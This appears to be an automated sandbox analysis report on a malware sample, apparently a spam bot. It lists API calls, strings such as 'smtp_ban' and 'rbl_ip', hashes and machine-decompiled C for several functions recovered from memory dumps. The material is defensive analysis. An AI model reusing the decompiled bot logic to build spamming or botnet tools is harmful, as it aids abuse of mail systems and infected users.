Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9

Uniqueness

Uniqueness Score: -1.00%

Function 02161FE6, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 205libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 02162016
GetSystemInfo.KERNEL32(?), ref: 02162038
GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 02162053
GetProcAddress.KERNEL32(00000000), ref: 0216205A
GetCurrentProcess.KERNEL32(?), ref: 0216206B
GetTickCount.KERNEL32 ref: 02162219

Part of subcall function 02161E2F: GetComputerNameA.KERNEL32(?,0000000F), ref: 02161E65

Strings

hi_id, xrefs: 02162166, 0216216B, 02162183
flags_upd, xrefs: 0216208E, 02162093, 021620CC
localcfg, xrefs: 0216207A, 02162081, 02162094, 021620CD, 021620DC, 02162102, 02162121, 02162137, 0216214F, 0216216C, 02162184, 021621A0, 021621C0
work_srv, xrefs: 021620AE

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: flags_upd$hi_id$localcfg$work_srv
API String ID: 4207808166-1391650218
Opcode ID: d2b49178a9ec071114ead141a94fb7601baf71a17f262ffda1f9ad51580ac116
Instruction ID: fbc48910b1278c22bf65f7b6351632167c328e3bfde1624da55dcc2b6f0c4525
Opcode Fuzzy Hash: d2b49178a9ec071114ead141a94fb7601baf71a17f262ffda1f9ad51580ac116
Instruction Fuzzy Hash: 5451C0B0984348AFE330AF658C8DF7BBBEDEB45704F00092DF99682141D7B9A564CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402011, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}

APIs

GetTickCount.KERNEL32 ref: 00402078
GetTickCount.KERNEL32 ref: 004020D4
GetTickCount.KERNEL32 ref: 004020DB
GetTickCount.KERNEL32 ref: 0040212B
GetTickCount.KERNEL32 ref: 00402132
GetTickCount.KERNEL32 ref: 00402142

Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,73AFF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093

Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899

Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1

Strings

localcfg, xrefs: 00402070, 00402160, 00402186, 00402194, 004021E4
rbl_ip, xrefs: 0040218F
net_type, xrefs: 004021DF
rbl_bl, xrefs: 00402181

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
String ID: localcfg$net_type$rbl_bl$rbl_ip
API String ID: 3976553417-1522128867
Opcode ID: 1bb6a535cad4af57600e8ff5f9866a63cd5bb7b68263ad928a3678253ee03cb3
Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
Opcode Fuzzy Hash: 1bb6a535cad4af57600e8ff5f9866a63cd5bb7b68263ad928a3678253ee03cb3
Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

APIs

Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

GetTickCount.KERNEL32 ref: 0040C31F
GetTickCount.KERNEL32 ref: 0040C32B
GetTickCount.KERNEL32 ref: 0040C363
GetTickCount.KERNEL32 ref: 0040C378
GetTickCount.KERNEL32 ref: 0040C44D
InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC

Strings

localcfg, xrefs: 0040C2DD

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
String ID: localcfg
API String ID: 1553760989-1857712256
Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14

Uniqueness

Uniqueness Score: -1.00%

Function 0216F565, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(0216CC6D), ref: 0216F59D
socket.WS2_32(00000002,00000001,00000000), ref: 0216F5B7
closesocket.WS2_32(00000000), ref: 0216F5C5

Strings

ps, xrefs: 0216F5C5, 0216F5F0
^s, xrefs: 0216F619
time_cfg, xrefs: 0216F573

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: closesockethtonssocket
String ID: ps$time_cfg$^s
API String ID: 311057483-2063425486
Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction ID: 7f0e7ebb78f1f34484b970d7819af200810ef34eed8068c19978691167d7e25e
Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
Instruction Fuzzy Hash: 3B315C72940118AFDB109FA4EC899FE7BBDFF89314F104166F916D3150E7B09A928BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02163042, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02163051
LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02163061
GetProcAddress.KERNEL32(00000000,00410408), ref: 0216307E
RtlAllocateHeap.NTDLL(00000000), ref: 0216309F
htons.WS2_32(00000035), ref: 021630D8
inet_addr.WS2_32(?), ref: 021630E3
gethostbyname.WS2_32(?), ref: 021630F6
HeapFree.KERNEL32(00000000), ref: 02163136

Strings

iphlpapi.dll, xrefs: 0216304B, 02163050, 02163060

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
String ID: iphlpapi.dll
API String ID: 2869546040-3565520932
Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction ID: 438685dcf347b65d5eeae6ad62ea450ce7714c82318233f57c1efd46a80b44c1
Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
Instruction Fuzzy Hash: 9731E471E40205ABDB109BB8DC4CBBE7BB8AF04B25F1481A5E924E3190DB74D5A18B58

Uniqueness

Uniqueness Score: -1.00%

Function 02169576, Relevance: 15.3, APIs: 10, Instructions: 284registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 02169590
GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 021695BE
GetModuleFileNameA.KERNEL32(00000000), ref: 021695C5
wsprintfA.USER32 ref: 0216961E
wsprintfA.USER32 ref: 0216965C
wsprintfA.USER32 ref: 021696DD
RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02169741
RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02169776
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 021697C1

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
String ID:
API String ID: 3696105349-0
Opcode ID: 3d5e61a764f0a53c7c2f84c748c6a2b46e492cfe2ec8a545598efa46f882ba96
Instruction ID: 3190e1ca5fc297de12092a0cfde470da45b0a93b095cead82ebed555d43a12c0
Opcode Fuzzy Hash: 3d5e61a764f0a53c7c2f84c748c6a2b46e492cfe2ec8a545598efa46f882ba96
Instruction Fuzzy Hash: 7FA16EB298024CAFEB25DFA0CC49FEE3BADEB04744F104026FA1596151E7B5D5A4CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402D21, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
memorylibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}

APIs

GetModuleHandleA.KERNEL32(00000000,73BCEA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
LoadLibraryA.KERNEL32(?), ref: 00402D4A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
HeapAlloc.KERNEL32(00000000), ref: 00402DA0
lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB

Strings

DnsQuery_A, xrefs: 00402D5B
dnsapi.dll, xrefs: 00402D29

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: DnsQuery_A$dnsapi.dll
API String ID: 3560063639-3847274415
Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE31, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

APIs

lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94

Strings

smtp_herr, xrefs: 0040BE46, 0040BF62
smtp_retr, xrefs: 0040BE61, 0040BF8C
smtp_ban, xrefs: 0040BE55, 0040BF77

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: smtp_ban$smtp_herr$smtp_retr
API String ID: 1586166983-1625972887
Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60, Relevance: 13.6, APIs: 9, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x5e060101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x5e060103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x5e060102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}

0x00406a60
0x00406a68
0x00406a7d
0x00406a83
0x00406a89
0x00406b8c
0x00406b9c
0x00406ba1
0x00000000
0x00406ba1
0x00406a91
0x00406a97
0x00406a9e
0x00406aa1
0x00406ab8
0x00406ac3
0x00406b1d
0x00406b27
0x00406b2f
0x00406b34
0x00406b5f
0x00406b61
0x00406b63
0x00406b86
0x00000000
0x00406b89
0x00406b65
0x00406b78
0x00406b7d
0x00406b7f
0x00406b80
0x00000000
0x00406b80
0x00406b36
0x00406b49
0x00406b4e
0x00000000
0x00406b4e
0x00406ad2
0x00406ad7
0x00406ada
0x00406adc
0x00000000
0x00000000
0x00406ade
0x00406af5
0x00406af5
0x00000000
0x00406afd
0x00406afd
0x00406aff
0x00000000
0x00000000
0x00406b01
0x00406b0a
0x00406b17
0x00406b17
0x00000000
0x00406b17
0x00406b03
0x00406b08
0x00000000
0x00000000
0x00000000
0x00406b08

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
